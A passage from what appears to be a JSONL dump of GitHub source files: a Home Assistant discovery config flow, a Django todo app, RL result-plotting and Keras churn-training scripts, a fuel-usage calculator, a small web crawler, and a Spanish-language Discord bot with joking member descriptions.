\"\")}{discovery_info.port}'\n )\n # Do not probe the device if the host is already configured\n self._async_abort_entries_match(self.server_id)\n\n # Check if already configured\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n self.context.update(\n {\n \"title_placeholders\": {\n CONF_HOST: discovery_info.host,\n CONF_PORT: discovery_info.port,\n },\n }\n )\n return await self.async_step_zeroconf_confirm()\n\n async def async_step_zeroconf_confirm(\n self, user_input: dict[str, Any] = None\n ) -> FlowResult:\n \"\"\"Handle a flow initiated by zeroconf.\"\"\"\n if user_input is not None:\n data = {\n CONF_HOST: self.zero_conf.host,\n CONF_PORT: self.zero_conf.port,\n }\n return self.async_create_entry(title=\"njsPC-HA\", data=data)\n return self.async_show_form(\n step_id=\"zeroconf_confirm\",\n data_schema=vol.Schema({}),\n description_placeholders={\n CONF_HOST: self.zero_conf.host,\n CONF_PORT: self.zero_conf.port,\n },\n )\n\n async def async_step_ssdp(self, discovery_info: ssdp.SsdpServiceInfo) -> FlowResult:\n \"\"\"Handle a flow initialized by SSDP discovery.\"\"\"\n self.host = urlparse(discovery_info.ssdp_location).hostname\n self.port = urlparse(discovery_info.ssdp_location).port\n self.server_id = f'njspcha_{self.host.replace(\".\", \"\")}{self.port}'\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n self.controller_name = discovery_info.upnp.get(\n ssdp.ATTR_UPNP_FRIENDLY_NAME, self.host\n )\n self.context.update(\n {\n \"title_placeholders\": {\n \"name\": self.controller_name,\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n },\n }\n )\n return await self.async_step_ssdp_confirm()\n\n async def async_step_ssdp_confirm(\n self, user_input: dict[str, Any] = None\n ) -> FlowResult:\n \"\"\"Handle a flow initiated by zeroconf.\"\"\"\n if user_input is not None:\n data = {\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n }\n return self.async_create_entry(title=\"njsPC-HA\", data=data)\n return self.async_show_form(\n step_id=\"ssdp_confirm\",\n data_schema=vol.Schema({}),\n description_placeholders={\n \"name\": self.controller_name,\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n },\n )\n\n\nclass CannotConnect(HomeAssistantError):\n \"\"\"Error to indicate we cannot 
connect.\"\"\"\n","repo_name":"Crewski/njsPC-HA","sub_path":"custom_components/njspc_ha/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"23954437874","text":"from django.shortcuts import render, get_object_or_404, redirect\n\nfrom todo_list.forms import TaskForm\nfrom todo_list.models import *\n\n# Create your views here.\ndef bienvenido(request):\n tasks = Task.objects.order_by('id')\n if request.method == 'POST':\n formaTask = TaskForm(request.POST)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm()\n return render(request, 'bienvenido-prueba.html', {'formaTask': formaTask, 'tasks': tasks})\n\ndef new(request):\n if request.method == 'POST':\n formaTask = TaskForm(request.POST)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm()\n return render(request, 'new.html', {'formaTask':formaTask})\n\ndef edit(request, id):\n task = get_object_or_404(Task, pk=id)\n if request.method == 'POST':\n formaTask = TaskForm(request.POST, instance = task)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm(instance=task)\n return render(request, 'edit.html', {'formaTask':formaTask})\n\n\ndef delete(request, id):\n task = get_object_or_404(Task, pk=id)\n if task:\n task.delete()\n return redirect('index')\n\n","repo_name":"nicookazan/DjangoTodolist","sub_path":"todo_list/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25985046309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProcess result directories\n\n@author: thomas\n\"\"\"\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom cycler import cycler\nplt.style.use('ggplot')\nmpl.rcParams['lines.linewidth'] = 5\nlines = [\"-\",\"--\",\"-.\",\":\"]\ncolours = ['r','g','b','y','k','w']\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'y','c','m','k','w']*2) +\n cycler('linestyle', [i for i in ['-', '--'] for j in range(8)])))\nimport os\nimport numpy as np\nimport sys\nimport shutil\nfrom hps import get_hps\n\ndef make_name(basename='',item1=None,val1=None,item2=None,val2=None,item3=None,val3=None,item4=None,val4=None,separator='-'):\n name = basename\n if item1 is not None:\n name += '{}:{}'.format(item1,val1)\n if item2 is not None:\n name += separator + '{}:{}'.format(item2,val2)\n if item3 is not None:\n name += separator + '{}:{}'.format(item3,val3)\n if item4 is not None:\n name += separator + '{}:{}'.format(item4,val4)\n return name\n\ndef get_subdirs(a_dir):\n return [name for name in os.listdir(a_dir)\n if os.path.isdir(os.path.join(a_dir, name))]\n\ndef process(base_result_dir,overview_dir,rep_dir):\n print('Processing folder {}'.format(base_result_dir))\n\n # load hps associated with this folder\n try: \n with open(base_result_dir + '/hps_raw.txt', 'r') as f:\n hps_list = f.read() \n hps = get_hps().parse(hps_list)\n except Exception as e:\n print('Base experiment folder {} with error {}'.format(base_result_dir,e))\n print('Removing empty folder {}'.format(base_result_dir))\n shutil.rmtree(base_result_dir)\n return\n \n # Set-up plots \n ep_run_plot = xy_subplot(xlabel='episodes',ylabel='Episode 
reward',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3)\n# av_run_plot = xy_subplot(xlabel='episodes',ylabel='Average reward',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# Qsa_run_plot = xy_subplot(xlabel='episodes',ylabel='Qsa norm',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# grad_run_plot = xy_subplot(xlabel='episodes',ylabel='Gradient norm',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# loss_run_plot = xy_subplot(xlabel='episodes',ylabel='Loss',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n\n # load in all data\n all_empty = True\n for it1,item1 in enumerate(hps.seq1):\n for it2,item2 in enumerate(hps.seq2):\n for it3,item3 in enumerate(hps.seq3):\n for it4,item4 in enumerate(hps.seq4): \n result_dir = base_result_dir + '/subplots/'\n if hps.loop_hyper:\n result_dir += make_name('',hps.item1,item1,hps.item2,item2,hps.item3,item3,hps.item4,item4) + '/'\n\n if not os.path.exists(result_dir):\n continue\n \n #ep_R_plot = xy_plot(ylabel='Episode reward',xlabel='episodes')\n #av_R_plot = xy_plot(ylabel='Average reward',xlabel='episodes')\n ep_c,ep_R_c,av_R_c,Qsa_c,grad_c,loss_c = np.array([]),np.array([]),np.array([]),np.array([]),np.array([]),np.array([])\n\n for rep in range(hps.n_rep):\n read_dir = result_dir + 'rep:{}'.format(rep) + '/'\n if not os.path.exists(read_dir):\n continue\n\n # Load raw data\n try:\n eps = np.loadtxt(read_dir+'episode_raw.txt') \n ep_R = np.loadtxt(read_dir+'ep_reward_raw.txt')\n\n if (len(eps)>0) and (len(ep_R)>0):\n # sometimes a txt get accidently empty due to a time limit when writing\n ep_c = np.append(ep_c,eps)\n ep_R_c = np.append(ep_R_c,ep_R)\n\n all_empty = False\n\n #av_R = np.loadtxt(read_dir+'av_reward_raw.txt')\n #Qsa_norm = np.loadtxt(read_dir+'Qsa_norm_raw.txt')\n #grad_norm = np.loadtxt(read_dir+'grad_norm_raw.txt')\n #loss = np.loadtxt(read_dir+'loss_raw.txt')\n except Exception as e:\n print(e)\n continue\n \n #av_R_c = np.append(av_R_c,av_R)\n #Qsa_c = np.append(Qsa_c,Qsa_norm)\n #grad_c = np.append(grad_c,grad_norm)\n #loss_c = np.append(loss_c,loss)\n\n \n # Finish repetition plots\n #ep_R_plot.finish()\n #av_R_plot.finish()\n #ep_R_plot.save(result_dir+'episode_reward')\n #av_R_plot.save(result_dir+'average_reward')\n\n if len(ep_c) == 0 or len(ep_R_c) == 0:\n print('empty {}, skipping folder'.format(base_result_dir))\n ep_c = np.array([0,1])\n ep_R_c = np.array([0,0])\n \n # Do smoothing over repetitions\n ep_run,ep_R_run = downsample_smooth(ep_c,ep_R_c,down_len=1000,window=50)\n \n np.savetxt(result_dir+'episode_run.txt',ep_run,fmt='%.3g') \n np.savetxt(result_dir+'ep_reward_run.txt',ep_R_run,fmt='%.3g') \n\n label = make_name('',hps.item1,item1,hps.item2,item2)\n \n max_ep = 10000\n ep_R_run = ep_R_run[ep_run<max_ep]\n ep_run = ep_run[ep_run<max_ep] \n ep_run_plot.add(x=ep_run,y=ep_R_run,row=it4,col=it3,label=label) \n \n# try: \n# ep_run,ep_R_run,av_R_run,Qsa_run,grad_run,loss_run = downsample_smooth(ep_c,ep_R_c,av_R_c,Qsa_c,grad_c,loss_c,down_len=1000,window=50)\n# np.savetxt(result_dir+'av_reward_run.txt',av_R_run,fmt='%.3g')\n# np.savetxt(result_dir+'Qsa_run.txt',Qsa_run,fmt='%.3g') \n# np.savetxt(result_dir+'grad_run.txt',grad_run,fmt='%.3g') \n# np.savetxt(result_dir+'loss_run.txt',loss_run,fmt='%.3g') \n#\n#\n# # add to the higher level plot\n# label = make_name('',hps.item1,item1,hps.item2,item2)\n# av_run_plot.add(x=ep_run,y=av_R_run,row=it4,col=it3,label=label)\n# 
Qsa_run_plot.add(x=ep_run,y=Qsa_run,row=it4,col=it3,label=label)\n# grad_run_plot.add(x=ep_run,y=grad_run,row=it4,col=it3,label=label)\n# loss_run_plot.add(x=ep_run,y=loss_run,row=it4,col=it3,label=label) \n# except:\n# pass\n #try:\n # Qsa_run = downsample_smooth(ep_c,ep_R_c,av_R_c,down_len=1000,window=50)\n # np.savetxt(result_dir+'Qsa_norm_run.txt',Qsa_run,fmt='%.3g') \n # Qsa_run_plot.add(x=ep_run,y=Qsa_run,row=it4,col=it3,label=label) \n #except:\n # pass\n if all_empty:\n print('Removing empty folder {}'.format(base_result_dir))\n shutil.rmtree(base_result_dir)\n else:\n ep_run_plot.finish()\n ep_run_plot.save(base_result_dir+'/Episode_reward_running',close=False)\n ep_run_plot.save(overview_dir+'Episode_reward/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# av_run_plot.finish()\n# av_run_plot.save(base_result_dir+'/Average_reward_running',close=False)\n# av_run_plot.save(overview_dir+'Average_reward/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# Qsa_run_plot.finish()\n# Qsa_run_plot.save(base_result_dir+'/Qsa_norm_running',close=False)\n# Qsa_run_plot.save(overview_dir+'Qsa_norm/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# grad_run_plot.finish()\n# grad_run_plot.save(base_result_dir+'/grad_norm_running',close=False)\n# grad_run_plot.save(overview_dir+'grad_norm/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# loss_run_plot.finish()\n# loss_run_plot.save(base_result_dir+'/loss_running',close=False)\n# loss_run_plot.save(overview_dir+'loss/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n\n\n # Mark this folder as processed\n #os.rename(base_result_dir,base_result_dir+'d')\n print('Processed folder')\n\ndef plot_result_array(result_array,result_name=None,item1=None,seq1=[None],item2=None,seq2=[None],item3=None,seq3=[None],item4=None,seq4=[None]):\n ''' result_array expects a single result in each entry in the (up to) 4D array'''\n\n #while result_array.ndim < 4:\n # result_array = np.expand_dims(result_array,-2)\n item_len = result_array.shape \n x_range = np.arange(1,item_len[0]+1)\n col_size = item_len[2]\n row_size = item_len[3] \n \n fig,ax = plt.subplots(nrows=row_size,ncols=col_size,sharex=True,sharey=True)\n fig.set_figheight(row_size*7)\n fig.set_figwidth(col_size*7)\n for k in range(row_size):\n for j in range(col_size):\n try:\n if ax.ndim == 2:\n col = ax[k,j]\n elif ax.ndim == 1:\n col = ax[j]\n except:\n col = ax\n for l in range(item_len[1]):\n if item2 is not None:\n col.plot(x_range,result_array[:,l,j,k],markersize=10,mew=5,marker='x',label='{} = {}'.format(item2,seq2[l]))\n else:\n col.plot(x_range,result_array[:,l,j,k],markersize=10,mew=5,marker='x') \n if item3 is not None and item4 is not None:\n col.set_title('{} = {}, {} = {}'.format(item3,seq3[j],item4,seq4[k]),fontsize=15)\n elif item3 is not None:\n col.set_title('{} = {}'.format(item3,seq3[j]),fontsize=15)\n if item1 is not None:\n col.set_xlabel(item1,fontsize=15)\n if result_name is not None:\n col.set_ylabel(result_name,rotation=90,fontsize=15) \n col.set_xticks(x_range)\n col.set_xlim([x_range[0]-0.3,x_range[-1]+0.3])\n col.set_xticklabels(seq1,fontsize=15)\n #col.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n col.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n #format_ticks(col,'x')\n #format_ticks(col,'y')\n col.legend(loc=0,fontsize=15)\n fig.tight_layout()\n\ndef downsample_smooth(ep_c,*args,down_len=500,window=50):\n # Sort\n out = sort_xy(ep_c,*args)\n \n # Downsample\n for i in range(len(out)):\n out[i] = downsample(out[i],down_len)\n\n # Smooth\n if len(out[0]) < window: 
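# (editor's note) guard for traces shorter than the smoothing window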
\n window = 1 # only for debugging, can't average short curves\n for i in range(1,len(out)):\n out[i] = running_mean(out[i],window)\n out[0] = out[0][(window-1):] \n \n return out\n\ndef downsample(x,out_len=1000):\n # recursively downsample array x by halving it\n # The out_len will be between out_len and 2*out_len\n if x.ndim == 0:\n x = x[None]\n elif x.ndim>1:\n x = np.squeeze(x)\n while len(x)>2*out_len:\n if is_odd(len(x)):\n x = x[:-1] # remove last item\n x = np.squeeze(np.mean(np.reshape(x,[-1,2]),axis=1))\n return x\n\ndef running_mean(x,window=50):\n return np.convolve(x, np.ones((window,))/window, mode='valid')\n\ndef is_odd(num):\n return bool(num & 1)\n\ndef sort_xy(x,*args):\n x = x[:-1]\n x_order = np.argsort(x)\n out = [x[x_order]]\n for arg in args:\n out.append(arg[x_order])\n return out\n\nclass xy_plot():\n def __init__(self,title=None,xlabel=None,ylabel=None):\n self.fig,self.ax=plt.subplots()\n if title is not None: self.ax.set_title(title)\n if xlabel is not None: self.ax.set_xlabel(xlabel)\n if ylabel is not None: self.ax.set_ylabel(ylabel)\n\n def add(self,x,y):\n self.ax.plot(x,y)\n \n def finish(self):\n self.ax.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n self.ax.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n self.ax.autoscale()\n self.fig.tight_layout()\n\n def save(self,save_dir):\n plt.figure(self.fig.number)\n plt.savefig('{}.png'.format(save_dir),bbox_inches=\"tight\")\n plt.close()\n\nclass xy_subplot():\n def __init__(self,xlabel=None,ylabel=None,row_item=None,row_seq=[None],col_item=None,col_seq=[None]):\n self.row_size = row_size = len(row_seq)\n self.col_size = col_size = len(col_seq)\n self.fig,self.ax=plt.subplots(nrows=row_size,ncols=col_size,sharex=True,sharey=True)\n self.fig.set_figheight(row_size*9)\n self.fig.set_figwidth(col_size*9)\n for i in range(row_size):\n for j in range(col_size):\n try:\n if self.ax.ndim == 2:\n col = self.ax[i,j]\n elif self.ax.ndim == 1:\n col = self.ax[j]\n except:\n col = self.ax\n if xlabel is not None:\n col.set_xlabel(xlabel,fontsize=15)\n if ylabel is not None:\n col.set_ylabel(ylabel,fontsize=15)\n if row_item is not None and col_item is not None:\n col.set_title('{} = {}, {} = {}'.format(col_item,col_seq[j],row_item,row_seq[i]),fontsize=15)\n elif col_item is not None:\n col.set_title('{} = {}'.format(col_item,col_seq[j]),fontsize=15)\n\n def add(self,x,y=None,row=0,col=0,label=''):\n try:\n if self.ax.ndim == 2:\n col = self.ax[row,col]\n elif self.ax.ndim == 1:\n col = self.ax[col]\n except:\n col = self.ax\n \n if y is not None:\n col.plot(x,y,label=label,linewidth=5)\n else:\n col.plot(x,label=label,linewidth=5)\n \n def finish(self):\n for i in range(self.row_size):\n for j in range(self.col_size):\n try:\n if self.ax.ndim == 2:\n col = self.ax[i,j]\n elif self.ax.ndim == 1:\n col = self.ax[j]\n except:\n col = self.ax\n #format_ticks(col,'x')\n #format_ticks(col,'y')\n col.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n col.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n y_lim = list(col.get_ylim())\n y_lim[0] -= (y_lim[1]-y_lim[0])/50\n y_lim[1] += (y_lim[1]-y_lim[0])/50 \n col.set_ylim(y_lim)\n if (j+1) == self.col_size and (i == 0): \n col.legend(loc='upper left',bbox_to_anchor=(1.04,1),ncol=1,fontsize=15)\n self.fig.tight_layout()\n\n def save(self,save_dir,close=True):\n plt.figure(self.fig.number)\n plt.savefig('{}.png'.format(save_dir),bbox_inches=\"tight\")\n if close: \n plt.close()\n \ndef format_ticks(ax,axis='x'):\n #ax.autoscale()\n ticks 
= ax.get_xticks().tolist() if axis == 'x' else ax.get_yticks().tolist()\n #ticks = [format(tick,'.3g') for tick in ticks]\n ax.set_xticklabels(ticks,fontsize=9) if axis == 'x' else ax.set_yticklabels(ticks,fontsize=9)\n\ndef loop_directories(result_dir,overview_dir):\n sub_dirs = get_subdirs(result_dir)\n for game_dir in sub_dirs:\n if 'game' in game_dir:\n name_dirs = get_subdirs(result_dir + game_dir + '/' )\n for name_dir in name_dirs:\n rep_dirs = get_subdirs(result_dir + game_dir + '/' + name_dir + '/')\n for rep_dir in rep_dirs:\n if not 'd' in rep_dir:\n # Need to process this one\n process(result_dir + game_dir + '/' + name_dir + '/' + rep_dir,overview_dir,rep_dir)\n\nif __name__ == \"__main__\": \n folder = 'icml_results' if len(sys.argv) < 2 else sys.argv[1]\n result_folder = '/home/thomas/' + folder + '/'\n print('Start looping through result folder {}'.format(result_folder))\n overview_dir= result_folder+'learning_curves/'\n if not os.path.exists(overview_dir):\n os.makedirs(overview_dir)\n os.makedirs(overview_dir + 'Episode_reward/')\n os.makedirs(overview_dir + 'Average_reward/')\n os.makedirs(overview_dir + 'Qsa_norm/')\n os.makedirs(overview_dir + 'grad_norm/')\n os.makedirs(overview_dir + 'loss/')\n\n loop_directories(result_folder,overview_dir) \n print('Done') \n","repo_name":"tmoer/return_distribution_exploration","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":17228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74205038249","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# Importing the libraries\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[3]:\n\n\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13]\ny = dataset.iloc[:, 13]\n\n\n# In[4]:\n\n\n\n#Create dummy variables\ngeography=pd.get_dummies(X[\"Geography\"],drop_first=True)\ngender=pd.get_dummies(X['Gender'],drop_first=True)\n\n\n# In[5]:\n\n\n\n## Concatenate the Data Frames\n\nX=pd.concat([X,geography,gender],axis=1)\n\n## Drop Unnecessary columns\nX=X.drop(['Geography','Gender'],axis=1)\n\n\n# In[6]:\n\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n\n# In[7]:\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n\n# In[9]:\n\n\n\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LeakyReLU,PReLU,ELU\nfrom keras.layers import Dropout\n\n\n# In[10]:\n\n\ndef tweak_model(classifier,layers,neurons,epochs,model_tweak_count):\n print(\"Model Tweak :\" ,model_tweak_count)\n print(\"Layers Added :\",layers)\n print(\"Neurons Per Layer :\",neurons)\n print(\"Epochs This Layer :\",epochs)\n print(\"********************************\") \n for i in range(layers):\n \n classifier.add(Dense(units = neurons, kernel_initializer = 'he_uniform',activation='relu'))\n return classifier \n\n\n# In[22]:\n\n\n\nneurons = 10\ntrain_acc = 0\nepochs = 90\nlayers = 1 \nflag = 0\nmodel_tweak_count=0\n\n\n\nwhile int(train_acc) < 90:\n if flag ==1 :\n classifer = keras.backend.clear_session()\n neurons = neurons+10\n epochs = epochs+5\n 
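# (editor's note) each failed attempt rebuilds a wider, deeper model and trains it longer\n        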
layers=layers+3\n model_tweak_count=model_tweak_count+1\n \n \n classifier = Sequential()\n \n classifier.add(Dense(units = 6, kernel_initializer = 'he_uniform',activation='relu',input_dim = 11))\n \n classifier = tweak_model(classifier,layers,neurons,epochs,model_tweak_count)\n classifier.add(Dense(units = 1, kernel_initializer = 'glorot_uniform', activation = 'sigmoid'))\n classifier.compile(optimizer = 'Adamax', loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n model_history=classifier.fit(X_train, y_train,validation_split=0.1, batch_size = 10, epochs = epochs,verbose=1)\n \n prev_acaccuracy=train_acc\n m_history=model_history.history\n train_acc=m_history['accuracy'][epochs-1] \n train_acc=round(train_acc*100,2)\n \n #prev_acaccuracy=accuracy\n # y_pred = classifier.predict(X_test)\n # y_pred = (y_pred > 0.5) \n # score=accuracy_score(y_pred,y_test)\n \n #accuracy=round(score*100,2)\n print(\"Previous Accuracy:\",prev_acaccuracy)\n print(\"Current Accuracy :\", train_acc)\n print(\"Accuracy Imporved by:\",train_acc-prev_acaccuracy)\n flag=1\n \n \n\n\n# In[ ]:\n\n\nclassifier.save('tweak_model.h5')\n\n","repo_name":"jai8004/Train_ML_Docker","sub_path":"tweak_model.py","file_name":"tweak_model.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22928907605","text":"\"\"\"\nProgrammer: Ben Quiñones\nTask: Write a basic program using inputs and outputs.\nPurpose: This will help you demonstrate your understanding of decisions (if statements) and logic.\n\"\"\"\nprint()\n###############\n## BEGINNING ##\n###############\ndef main():\n end = 0\n start = 0\n gallons = 0\n mpg = 0\n lp100k = 0\n # ^ Variables ^ #\n #################\n\n start = int(input(\"Enter the first odometer reading (in miles): \"))\n end = int(input(\"Enter the second odometer reading (in miles): \"))\n gallons = float(input(\"Enter the amount of fuel used (in gallons): \"))\n mpg = miles_per_gallon(start, end, gallons)\n lp100k = lp100k_from_mpg(mpg)\n\n print(f\"{mpg:.1f} miles per gallon\")\n print(f\"{lp100k:.2f} liters per 100 kilometers\")\n \n pass\n\ndef miles_per_gallon(start_miles, end_miles, amount_gallons):\n mpg = (end_miles - start_miles) / amount_gallons\n # ^ Variables ^ #\n #################\n\n return mpg\n\ndef lp100k_from_mpg(mpg):\n lp100k = 235.215 / mpg\n \"(lp100k) is Liters per 100 kilometers\"\n # ^ Variables ^ #\n #################\n\n return lp100k\n\nmain()\n\n\n#########\n## END ##\n#########\nprint()","repo_name":"qbenji99/CSE111","sub_path":"5_fuel_usage.py","file_name":"5_fuel_usage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11650872831","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\nimport logging\n\nfrom urllib.parse import urljoin\nfrom tqdm import tqdm\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\nclass Clawer(object):\n def __init__(self, parser=BeautifulSoup, parser_feature='html.parser'):\n self.parser = parser\n self.parser_feature = parser_feature\n\n def craw(self, 
url, rule_fn):\n        try:\n            with closing(get(url, stream=True)) as resp:\n                if is_good_response(resp):\n                    response = resp.content\n                else:\n                    response = None\n\n        except RequestException as e:\n            logging.error('Error during requests to {0} : {1}'.format(url, str(e)))\n            response = None\n\n        # guard added by the editor: BeautifulSoup cannot parse None, so bail out early\n        if response is None:\n            return None\n\n        parser_ = self.parser(response, self.parser_feature)\n        outs = rule_fn(parser_)\n\n        return outs\n\n\nif __name__ == '__main__':\n    # url = 'https://papers.nips.cc/'\n    # crawler = Clawer()\n    #\n    #\n    # def rule_href(parser):\n    #     outs = []\n    #     for li in parser.select('li'):\n    #         href = li.find('a').get('href')\n    #         if len(href) > 1:\n    #             outs.append(href)\n    #     return outs\n    #\n    #\n    # print(crawler.craw(url, rule_href))\n    #\n    # hrefs = ['/book/advances-in-neural-information-processing-systems-32-2019']\n    #\n    #\n    # def rule_title(parser):\n    #     outs = []\n    #     for li in parser.select('li'):\n    #         for name in li.find('a').text.split('\\n'):\n    #             if len(name) > 5:\n    #                 outs.append(name.strip())\n    #     return outs\n    #\n    #\n    # outs = crawler.craw(urljoin(url, hrefs[0]), rule_title)\n    #\n    # word_dict = {}\n    # for out in outs:\n    #     for word in out.split():\n    #         try:\n    #             word_dict[word] += 1\n    #         except:\n    #             word_dict[word] = 1\n    # with open('word_dict.json', 'w+') as f:\n    #     json.dump(word_dict, f, indent=4, sort_keys=True,\n    #               ensure_ascii=False, separators=(',', ': '))\n    \"\"\"\n    ----\n    \"\"\"\n    with open('word_dict.json', 'r') as f:\n        word_dict = json.load(f)\n    word_dict_sort = {k: v for k, v in sorted(word_dict.items(), key=lambda item: item[1])}\n    print(word_dict_sort)\n    # import matplotlib.pyplot as plt\n    # plt.bar(word_dict.keys(), word_dict)\n    # plt.show()\n","repo_name":"j-pong/HYnet","sub_path":"utils/crawler/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8287181118","text":"import discord\r\nfrom discord.ext import commands\r\nimport datetime\r\nfrom urllib import parse, request\r\nimport re\r\n\r\n#first we assign the bot a prefix, so people can communicate with it.\r\nbot = commands.Bot(command_prefix=\".\", description=\"Bot de Mateo Ifrán.\")\r\n\r\n#we apply the decorator called \"command\", which lets us create a command.\r\n@bot.command()\r\n#but we will have to handle that command with a function\r\nasync def botinfo(ctx):\r\n    #async and await make it wait a moment before running\r\n    embed = discord.Embed(title=\"Bot desarrollado por Mateo Ifrán.\", description=\"Por ahora puedo hacer poco, pero la forma de utilizarme es poniendo un punto como prefijo. Por ejemplo: .mateo \\n \\n Cosas que puedo hacer hasta ahora: \\n \\n -Busco videos de youtube, solo con el comando: .yt /seguido de lo que quieras buscar.\\n \\n -Describo a cada participante del chat 'Bar de manolo'. Solo tenes que poner el prefijo y el nombre del participante. \\n \\n -Se sumar!! Solamente pone: .suma (numeros que quieras sumar separados por un espacio). \\n \\n Con .info puedo mostrarte la información del servidor.\" , timestamp=datetime.datetime.utcnow())\r\n    await ctx.send(embed=embed)\r\n\r\n#ADDITION\r\n@bot.command()\r\nasync def suma(ctx, numero1: float, numero2: float):\r\n    await ctx.send(numero1 + numero2)\r\n#SHOW STATISTICS\r\n@bot.command()\r\nasync def info(ctx):\r\n    embed = discord.Embed(title=f\"{ctx.guild.name}\", description=\"Marginados y exiliados, sean bienvenidos.\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n    embed.add_field(name=\"Server created at\", value=f\"{ctx.guild.created_at}\")\r\n    embed.add_field(name=\"Server Owner\", value=f\"{ctx.guild.owner}\")\r\n    embed.add_field(name=\"Server Region\", value=f\"{ctx.guild.region}\")\r\n    embed.add_field(name=\"Server ID\", value=f\"{ctx.guild.id}\")\r\n    #embed.set_thumbnail(url=) //this is used to add an image\r\n    \r\n    await ctx.send(embed=embed)\r\n    \r\n#OPINION COMMANDS ABOUT THE USERS\r\n@bot.command()\r\nasync def mateo(ctx):\r\n    await ctx.send(\"Mateo me controla. Estoy obligado a decir que es un genio.\")\r\n@bot.command()\r\nasync def leme(ctx):\r\n    await ctx.send(\"Antes se escuchaba el rumor de que se la comía. Pero ahora sabemos que solo se come balas del Cs Go.\")\r\n@bot.command()\r\nasync def rodri(ctx):\r\n    await ctx.send(\"El viejo es un tierno, pero se hace el duro.\")\r\n@bot.command()\r\nasync def lea(ctx):\r\n    await ctx.send(\"Un talentoso en el arte. (pero colorado :/)\")\r\n@bot.command()\r\nasync def fede(ctx):\r\n    await ctx.send(\"Tiene que tomarse la vida con calma y dejar de empastillarse.\")\r\n@bot.command()\r\nasync def walter(ctx):\r\n    await ctx.send(\"No importa cual sea la actividad. El te va a poner una excusa de porque no es el mejor en eso.\")\r\n@bot.command()\r\nasync def lucas(ctx):\r\n    await ctx.send(\"Sabemos que es el más turbio de todos, aún asi lo queremos.\")\r\n@bot.command()\r\nasync def mauri(ctx):\r\n    await ctx.send(\"Un blandito, fan de Auron y laburador (jajajajaja).\")\r\n@bot.command()\r\nasync def bon(ctx):\r\n    await ctx.send(\"Él te bardea por las dudas, ni se lo piensa.\")\r\n@bot.command()\r\nasync def nacho(ctx):\r\n    await ctx.send(\"Casi todo le da paja, le da paja hasta tener paja.\")\r\n@bot.command()\r\nasync def fer(ctx):\r\n    await ctx.send(\"Fer, su risa lo incrimina más y más. Atras señor Fer AHHHHHHAIUSDHJIUASDHI\")\r\n@bot.command()\r\nasync def rusa(ctx):\r\n    await ctx.send(\"Ansiosa, copada y juega bien al Cs 1.6 ¿Qué más queres?\")\r\n@bot.command()\r\nasync def pri(ctx):\r\n    await ctx.send(\"Cara de angel pero fan del kpop, una 